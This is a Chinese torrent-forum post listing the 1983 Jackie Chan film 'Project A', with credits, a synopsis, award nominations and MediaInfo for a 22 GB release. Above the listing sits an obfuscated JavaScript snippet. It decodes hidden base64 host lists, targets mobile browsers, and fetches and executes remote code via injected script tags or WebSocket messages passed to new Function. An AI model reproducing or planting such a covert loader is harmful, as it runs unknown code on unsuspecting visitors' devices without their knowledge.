A计划[粤语音轨/简繁字幕]Project.A.1983.1080p.WEB-DL.H264.DDP5.1-迅雷下载 22.39GB

版主小s 1月前 233

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x62\x50\x73\x42\x6e\x58\x4f\x42\x73\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXlxa2RmODc5Zi5hc2xleXR5LmNvbbSxodHRwczovL29oamZrN2pmMjguZ3Nqemxzc3dzLmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};

A计划[粤语音轨/简繁字幕]Project.A.1983.1080p.WEB-DL.H264.DDP5.1-迅雷下载 22.39GB

◎译  名 A计划 / Project A
◎片  名 A計劃
◎年  代 1983
◎产  地 中国香港
◎类  别 喜剧 / 动作
◎语  言 粤语
◎上映日期 1983-12-22(中国香港)
◎IMDb链接 https://www.imdb.com/title/tt0085127/
◎豆瓣评分 8.0/10 (117113人评价)
◎豆瓣链接 https://movie.douban.com/subject/1297909/
◎片  长 105分钟
◎导  演 成龙 Jackie Chan (id:1054531)
◎编  剧 邓景生 Edward Tang (id:1298905)
       成龙 Jackie Chan (id:1054531)
◎演  员 成龙 Jackie Chan (id:1054531)
       洪金宝 Sammo Hung Kam-Bo (id:1055887)
       元彪 Biao Yuen (id:1163752)
       黄曼凝 Isabella Wong (id:1341914)
       狄威 Dick Wei (id:1318441)
       太保 Po Tai (id:1312993)
       午马 Wu Ma (id:1054282)
       钱嘉乐 Kar Lok Chin (id:1025476)
       火星 Mars (id:1033056)
       李海生 Hoi Sang Lee (id:1274574)
       关海山 Hoi-Shan Kwan (id:1289167)
       王伟 Wai Wong (id:1274583)
       罗浩楷 Ho Kai Law (id:1329430)
       刘克宣 Hark-Sun Lau (id:1340134)
       韩义生 Yee Sang Hon (id:1341964)
       劳拉·福纳 Lola Forner (id:1018950)
       冯敬文 Ging Man Fung (id:1341397)
       李健生 Chris Lee (id:1328406)
       吴勉勤 Ng Min Kan (id:1326358)
       姚文基 Man-kei Yiu (id:1435360)
       梁尚云 Shang-yun Liang (id:1423007)
       麦飞鸿 Fei-Hung Mak (id:1389316)
       谈泉庆 Chuen-Hing Tam (id:1411313)
       陈志辉 Chi Fai Chan (id:1312869)
       张作舟 Chok Chow Cheung (id:1417191)
       刘允 Yue Tau Wan (id:1386905)
       萧玉 Hsiao Yu (id:1413096)
       刘晃世 Huang-Hsi Liu (id:1413056)
       杜少明 Siu-Ming To (id:1360414)
       刘俊辉 Chun Fai Lau (id:1326417)
       林富伟 Fu-wai Lam (id:1433957)
       孙志伟 Chi-wei Sun (id:1430278)
       林源 Lam Yuen (id:1424224)
       朱斗 Tau Chu (id:1441054)
       尹尚林 Hsiang Lin Yin (id:1406340)
       沙鸥 Ou Sha (id:1423762)
       何云 Yun Ho (id:1417193)
       户田惠子 Keiko Toda (id:1051741)
       张济平 Jiping Zhang (id:1329827)
       冯雪瑞 Xuerui Feng (id:1329826)
       Tom Konkle Tom Konkle (id:1193131)
       约翰·德米塔 John DeMita (id:1081536)
       E·E·贝尔 E.E. Bell (id:1061371)
       丹尼·特雷霍 Danny Trejo (id:1044721)
       张午郎 John Cheung (id:1348971)
       黎强权 Benny Lai Keung-Kuen (id:1316555)
       邓景生 Edward Tang (id:1298905)
       邹文怀 Raymond Chow (id:1016883)
       何冠昌 Leonard Ho (id:1286717)
       陈佩华 Jessica Chan Pooi-Wa (id:1372898)
       黎小田 Siu-Tin Lei (id:1289746)
       张耀祖 Yiu-Tsou Cheung (id:1280628)
       张耀宗 Peter Cheung (id:1280650)
       赵鲁江 Lu Chiang Chao (id:1361092)
       周少龙 Shao Lung Chou (id:1344862)

◎标  签 成龙 / 动作 / 香港 / 喜剧 / 香港电影 / A计划 / 1983 / 经典

◎简  介
  上世纪初,猖獗的香港海盗屡屡劫持商船,考虑到各国商家的投资信心会因此减少,继尔香港国际贸易中心的地位可能会不保,当局改编水师,成立了一支特警小队负责海上治安。                                    
                                队长马如龙(成龙)执行公务时遭人陷害,愤而辞职。海盗头目罗三炮(狄威)抓走官兵家眷做人质,当局决定利用内线周永龄从中调停。因为早知周永龄与海盗勾结,马如龙自告奋勇拯救人质,他重组水师,制定了A计划,期望通过与上司洪天赐(元彪)及好兄弟卓一飞(洪金宝)作里应外合,将海盗一网打尽。

◎获奖情况 (共4项)
  第21届台北金马影展 (1984)
  金马奖 最佳男主角(提名)
   └──成龙 (id:1054531)
  金马奖 最佳剪辑(提名)
   └──张耀宗 (id:1280650)

  第4届香港电影金像奖 (1985)
  最佳男主角(提名)
   └──成龙 (id:1054531)
  最佳服装造型设计

  1. ##### MediaInfo ######
  2. General
  3. Unique ID                                : 273452650436203273599716845793570168846 (0xCDB91095BB23930368D4E87AE317A00E)
  4. Complete name                            : [email protected]
  5. Format                                   : Matroska
  6. Format version                           : Version 4
  7. File size                                : 22.4 GiB
  8. Duration                                 : 1 h 41 min
  9. Overall bit rate mode                    : Variable
  10. Overall bit rate                         : 31.6 Mb/s
  11. Encoded date                             : UTC 2021-07-07 09:46:11
  12. Writing application                      : mkvmerge v56.1.0 ('My Friend') 64-bit
  13. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4
  14. Video
  15. ID                                       : 1
  16. Format                                   : AVC
  17. Format/Info                              : Advanced Video Codec
  18. Format profile                           : [email protected]
  19. Format settings                          : CABAC / 2 Ref Frames
  20. Format settings, CABAC                   : Yes
  21. Format settings, Reference frames        : 2 frames
  22. Format settings, GOP                     : M=2, N=24
  23. Codec ID                                 : V_MPEG4/ISO/AVC
  24. Duration                                 : 1 h 41 min
  25. Bit rate mode                            : Variable
  26. Bit rate                                 : 30.9 Mb/s
  27. Maximum bit rate                         : 768 kb/s
  28. Width                                    : 1 920 pixels
  29. Height                                   : 1 080 pixels
  30. Display aspect ratio                     : 16:9
  31. Frame rate mode                          : Constant
  32. Frame rate                               : 25.000 FPS
  33. Color space                              : YUV
  34. Chroma subsampling                       : 4:2:0
  35. Bit depth                                : 8 bits
  36. Scan type                                : Progressive
  37. Bits/(Pixel*Frame)                       : 0.596
  38. Stream size                              : 21.8 GiB (98%)
  39. Language                                 : Chinese
  40. Default                                  : Yes
  41. Forced                                   : No
  42. Color range                              : Limited
  43. Color primaries                          : BT.709
  44. Transfer characteristics                 : BT.709
  45. Matrix coefficients                      : BT.709
  46. Audio
  47. ID                                       : 2
  48. Format                                   : E-AC-3
  49. Format/Info                              : Enhanced AC-3
  50. Commercial name                          : Dolby Digital Plus
  51. Codec ID                                 : A_EAC3
  52. Duration                                 : 1 h 41 min
  53. Bit rate mode                            : Constant
  54. Bit rate                                 : 768 kb/s
  55. Channel(s)                               : 6 channels
  56. Channel layout                           : L R C LFE Ls Rs
  57. Sampling rate                            : 48.0 kHz
  58. Frame rate                               : 31.250 FPS (1536 SPF)
  59. Compression mode                         : Lossy
  60. Stream size                              : 556 MiB (2%)
  61. Title                                    : Cantonese
  62. Language                                 : Chinese
  63. Service kind                             : Complete Main
  64. Default                                  : Yes
  65. Forced                                   : No
  66. Text #1
  67. ID                                       : 3
  68. Format                                   : UTF-8
  69. Codec ID                                 : S_TEXT/UTF8
  70. Codec ID/Info                            : UTF-8 Plain Text
  71. Duration                                 : 1 h 37 min
  72. Bit rate                                 : 51 b/s
  73. Count of elements                        : 1504
  74. Stream size                              : 37.0 KiB (0%)
  75. Title                                    : Chinese Simplified
  76. Language                                 : Chinese
  77. Default                                  : Yes
  78. Forced                                   : No
  79. Text #2
  80. ID                                       : 4
  81. Format                                   : UTF-8
  82. Codec ID                                 : S_TEXT/UTF8
  83. Codec ID/Info                            : UTF-8 Plain Text
  84. Duration                                 : 1 h 37 min
  85. Bit rate                                 : 51 b/s
  86. Count of elements                        : 1504
  87. Stream size                              : 37.0 KiB (0%)
  88. Title                                    : Chinese Traditional
  89. Language                                 : Chinese
  90. Default                                  : No
  91. Forced                                   : No
  92. Text #3
  93. ID                                       : 5
  94. Format                                   : UTF-8
  95. Codec ID                                 : S_TEXT/UTF8
  96. Codec ID/Info                            : UTF-8 Plain Text
  97. Duration                                 : 1 h 37 min
  98. Bit rate                                 : 51 b/s
  99. Count of elements                        : 1504
  100. Stream size                              : 37.0 KiB (0%)
  101. Language                                 : English
  102. Default                                  : No
  103. Forced                                   : No



此处一般会放置磁力链或电驴下载链接,不过此链接需要注册会员才能看到,点击“立即注册”
磁力链下载【磁力链接仅对注册会员开放,登陆后可见】

TAGS 动作 喜剧

上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回